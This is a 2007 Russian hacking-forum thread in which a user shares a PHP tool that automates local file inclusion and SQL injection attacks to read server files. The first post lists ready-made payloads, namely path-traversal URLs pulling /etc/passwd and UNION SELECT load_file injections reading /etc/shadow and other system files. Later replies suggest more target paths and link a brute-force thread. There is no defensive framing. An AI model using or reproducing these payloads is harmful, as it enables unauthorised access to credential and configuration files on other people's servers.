LogS--ToolS

Discussion in 'Уязвимости' started by NOmeR1, 23 Sep 2007.

  1. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Написал скрипт, который автоматически ищет логи, при локальном инклуде и SQL инъекции.
    В файл dirs.txt записываем диры, которые надо проверить.

    Download:
    - [0x57656246696C652E7275]
    - [0xSLIL.0xRU]

    Скрипт может не работать если:
    - Не выводится ошибка
    - Вы неверно ввели урл

    Сокеты не нужны.

    Подходящий хостинг - ueuo.com


    Примеры:
    1. PHP-Inj:
    - Пишем url: http://site.ru/include.php?file=
    PHP:
     Результат [quote]http://site.ru/include.php?file=../../../../../../../../../../../../etc/passwd
    http://site.ru/include.php?file=../../../../../../../../../../../../etc/hosts
    http://site.ru/include.php?file=../../../../../../../../../../../../etc/ftpusers
    http://site.ru/include.php?file=../../../../../../../../../../../../etc/syslog.conf
    http://site.ru/include.php?file=../../../../../../../../../../../../etc/services
    http://site.ru/include.php?file=../../../../../../../../../../../../etc/group
    http://site.ru/include.php?file=../../../../../../../../../../../../etc/bash.bashrc
    http://site.ru/include.php?file=../../../../../../../../../../../../etc/profile
    http://site.ru/include.php?file=../../../../../../../../../../../../etc/skel/.bashrc[/quote]
    2. SQL-Inj:
     - 
    Пишем urlhttp://site.ru/users.php?id=[sql]
     
    Колумнов12
     
    Ставим запрос на7
     
    Результат [quote]http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f706173737764),8,9,10,11,12
    http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f736861646f77),8,9,10,11,12
    http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f686f737473),8,9,10,11,12
    http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7365727669636573),8,9,10,11,12
    http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f67726f7570),8,9,10,11,12
    http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f6e6574776f726b73),8,9,10,11,12
    http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f70726f66696c65),8,9,10,11,12
    http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f736b656c2f2e626173687263),8,9,10,11,12[/quote][/INDENT]

    Смотрите также
     
    - [url=http://forum.antichat.ru/thread49574.html]Mail.Ru BruteForce[/url]
     
    - [url=http://forum.antichat.ru/thread49610.html]Rambler.Ru[/url]
     
    #1 NOmeR1, 23 Sep 2007
    Last edited: 29 Oct 2007
    6 people like this.
  2. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Обновил скрипт, теперь вместо [/COLOR] надо писать [COLOR=YellowG...Green]http://x0.6te.net/injection.php[/COLOR]
     
    1 person likes this.
  3. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    удобный скриптик.. не нужно самому подставлять..
     
    1 person likes this.
  4. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    номер 1 не ленись составь нормальный список, на конфиги и так далее таких тулз дофига а словарей нету...
     
  5. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Таких тулз - 0 не считая мою, тем более на PHP. И чем тебе не нравится список логов?
     
    #5 NOmeR1, 26 Sep 2007
    Last edited: 26 Sep 2007
  6. Светлый

    Светлый Elder - Старейшина

    Joined:
    28 Jun 2007
    Messages:
    159
    Likes Received:
    47
    Reputations:
    46
    неплохо было бы дефолтные виндовые пути вписать ;)
     
  7. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    1, норм прога...вот Кеш неплохую идею подогнал!

    Светлый, о каких путях на винде ты говоришь??? $systemdir ??
     
  8. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    C:\boot.ini
     
  9. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    Уверен?
    http://forum.antichat.ru/thread45289.html
     
  10. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Таких тулз у меня компе минимум 6 причем есть те которые работают гараздо лучше.
     
    2 people like this.
  11. nikoTM

    nikoTM Elder - Старейшина

    Joined:
    25 Sep 2007
    Messages:
    41
    Likes Received:
    6
    Reputations:
    0
    Кэш, ты нервный или мне кажется?О_о
     
  12. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Ок, не нравится, не ешь, у тебя наверно один приват.
    Я уже давно эту прогу смотрел, она не пашет и не атоматическая, много кнопок всяких :)
     
    1 person likes this.
  13. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Обновил скрипт, обновил логи. Если кто-то хочет помочь, пишите ещё пути сюда, добавлю.

    P.S. Скрипт теперь ищет дольше, но больше.
    P.P.S. Не могу зайти на x0.6te.net, поэтому не могу обновить.
     
    #13 NOmeR1, 7 Oct 2007
    Last edited: 7 Oct 2007